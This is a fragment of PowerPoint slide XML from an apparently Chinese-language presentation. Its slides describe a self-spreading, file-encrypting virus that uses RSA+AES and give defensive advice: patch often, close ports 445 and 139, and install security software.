            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="186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BEBCE0-4418-4E81-B07F-512BCBD9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-382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36CDB-B6E9-4823-9FF2-6FF3F69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39" y="8037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6E04DB-E9B9-4DA3-A7DD-56B9EF6A7383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563735" y="2387692"/>
            <a:ext cx="10235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此病毒通过远程高危漏洞进行自我传播复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>并且加密文件采用了高强度的双</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RSA+AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>至少目前来说破解秘钥是不可能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>只能通过预防的方式来防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>勤打补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>及时安装安全软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="828106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38529" y="2852937"/>
            <a:ext cx="6372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谢谢，敬请批评指正！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3746</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>380</Paragraphs>
  <Slides>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7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Times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Costanzo Sirius</dc:creator>
  <cp:lastModifiedBy>Costanzo Sirius</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-30T14:37:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-02T15:42:38Z</dcterms:modified>
</cp:coreProperties>
</file>